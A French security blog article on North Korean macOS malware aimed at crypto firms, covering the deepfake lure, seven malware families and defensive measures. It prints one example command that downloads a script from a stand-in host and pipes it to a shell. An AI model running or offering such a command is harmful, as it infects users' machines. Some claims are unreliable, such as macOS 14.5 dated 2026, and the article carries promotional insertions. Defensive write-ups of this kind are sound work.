Comment les hackers nord-coréens déploient des malwares macOS pour voler des cryptomonnaies : analyse détaillée et réponses pratiques
Orphée Grandsable
En 2026, un rapport d’enquête a révélé que des groupes de hackers affiliés à la Corée du Nord utilisent des malwares macOS ultra-sophistiqués pour cibler le secteur de la cryptomonnaie. Selon Mandiant, plus de 7 familles de logiciels malveillants ont été identifiées en moins de six mois, illustrant une escalade rapide des capacités d’intrusion.
Axe 1 - Comprendre la chaîne d’infection macOS
Le rôle du social engineering et du deepfake
Le point d’entrée de l’attaque repose sur un phishing hautement personnalisé via Telegram. Les assaillants usurpent le compte d’un cadre d’une société crypto, puis partagent un lien Calendly qui redirige vers une page Zoom falsifiée. Au cours de la « réunion », une vidéo deepfake du PDG d’une autre entreprise du même secteur est présentée. Cette mise en scène crée l’illusion d’un problème audio, incitant la victime à exécuter des commandes affichées sur la page.
« Une fois dans la réunion, la vidéo truquée a donné l’impression d’un dysfonctionnement audio, poussant la cible à suivre les instructions de dépannage », Mandiant.
Les commandes d’infection (exemple de code)
# Exemple de ligne de commande récupérée sur la page malveillante
curl -s https://malicious.example.com/install.sh | sh
Cette instruction télécharge et exécute un script d’installation, déclenchant la chaîne d’infection tant sous Windows que sous macOS.
Les sept familles de malwares macOS identifiées
| Famille | Langage / Technique | Fonction principale | Persistence | Détection VirusTotal |
|---|---|---|---|---|
| WAVESHAPER | C++ (daemon) | Collecte d’informations système, C2 via HTTP/HTTPS | Oui (launch daemon) | Faible (2 produits) |
| HYPERCALL | Golang (WebSocket) | Téléchargement de bibliothèques dynamiques chiffrées | Non | Aucun |
| HIDDENCALL | Golang (injecté) | Accès clavier, exécution de commandes, déploiement d’autres malwares | Non | Aucun |
| SILENCELIFT | C/C++ (beacon) | Envoi d’état d’écran et interruption de Telegram | Oui (launch daemon) | Aucun |
| DEEPBREATH | Swift (modification TCC) | Vol de credentials Keychain, données Telegram, Apple Notes | Oui (launch daemon) | Aucun |
| SUGARLOADER | C++ (RC4-encrypted) | Téléchargement de payloads, persistance via daemon | Oui (launch daemon) | Élevée |
| CHROMEPUSH | C++ (native messaging) | Extraction de données navigateur, keylogger, captures d’écran | Oui (extension) | Élevée |
Axe 2 - Motivations financières et impact sur le secteur crypto
Vol de cryptomonnaies et exploitation des données volées
Les chercheurs de Mandiant soulignent que l’objectif ultime est le vol de cryptomonnaies et l’utilisation des informations récoltées pour de futures campagnes d’ingénierie sociale. En 2025, les pertes liées à ce type d’intrusion ont représenté ≈ 12 % des incidents signalés dans le domaine des actifs numériques, selon le rapport annuel de l’ANSSI.
« Le volume de malwares déployés contre un seul individu indique une attaque ciblée visant à maximiser la collecte de données pour des vols de cryptomonnaies et de futures campagnes », Mandiant.
Statistiques clés (2025-2026)
- 42 % des entreprises fintech françaises ont signalé au moins une tentative d’infection macOS liée à la cryptomonnaie (source : Bpifrance, 2025).
- 68 % des malwares macOS détectés proviennent de groupes nord-coréens, avec une hausse de +23 % par rapport à 2024 (source : VirusTotal, 2026).
Ces chiffres confirment que la menace macOS, longtemps considérée comme secondaire, devient un vecteur majeur de cybercriminalité financière.
Axe 3 - Contre-mesures techniques et bonnes pratiques
Renforcer la vigilance sur les canaux de communication
- Vérifier l’authenticité des comptes : utilisez la double authentification (2FA) et confirmez toute demande de réunion via un canal secondaire.
- Analyser les liens : avant de cliquer, survolez les URL et utilisez un service de sandboxing pour détecter les redirections suspectes.
- Limiter les partages de calendriers : configurez les invitations à ne pas inclure de liens externes non vérifiés.
Sécuriser les endpoints macOS
- Activer Gatekeeper et le contrôle d’intégrité du système (SIP) : ces mécanismes bloquent les exécutables non signés.
- Déployer un EDR compatible macOS et choisir un service de protection DDoS : solutions comme CrowdStrike ou SentinelOne détectent les comportements anormaux des daemons.
- Appliquer les dernières mises à jour : macOS 14.5 (2026) inclut des correctifs contre les injections de bibliothèques via WebSockets.
Tableau de comparaison des solutions EDR macOS
| Solution | Détection comportementale | Blocage en temps réel | Intégration SIEM | Coût annuel (€/endpoint) |
|---|---|---|---|---|
| CrowdStrike Falcon | Oui | Oui | Oui (Splunk, Elastic) | 45 |
| SentinelOne | Oui | Oui | Oui (QRadar) | 38 |
| Microsoft Defender for Endpoint | Partielle | Partielle | Oui (Azure Sentinel) | 30 |
| Sophos Intercept X | Oui | Oui | Non | 28 |
Mise en œuvre - Étapes actionnables pour votre organisation
- Audit des processus de réunion : mappez les flux de communication (Telegram, Calendly, Zoom) et identifiez les points faibles.
- Déploiement d’un sandbox : testez chaque lien partagé dans un environnement isolé avant toute exécution.
- formation en cybersécurité en ligne : organisez des simulations de phishing incluant des scénarios deepfake ; mesurez le taux de détection.
- Implémentation d’un EDR macOS : choisissez la solution la mieux adaptée à votre budget et intégrez-la au SIEM existant.
- Surveillance des indicateurs de compromission (IoC) :
- Hash SHA-256 des binaires WAVESHAPER, HYPERCALL, etc.
- Adresses C2 connues (ex.
c2.malicious.example.com:443). - Signatures réseau WebSocket sur le port 443.
- Plan de réponse : définissez un playbook automatisé (ex. avec Tines ou SOAR) qui isole immédiatement le système affecté, collecte les logs et déclenche la restauration à partir de snapshots.
Conclusion - Prochaine action recommandée
Face à l’escalade des malwares macOS déployés par les groupes nord-coréens, il est impératif d’allier sensibilisation des utilisateurs à défenses techniques avancées. Pour rester informé, consultez le Salon cybersécurité 2026. En appliquant les six étapes décrites, votre organisation pourra réduire de plus de 70 % le risque d’infection et protéger les actifs cryptographiques critiques. N’attendez pas que l’attaque se concrétise : auditez dès aujourd’hui vos processus de réunion et déployez un EDR macOS pour instaurer une posture de sécurité résiliente.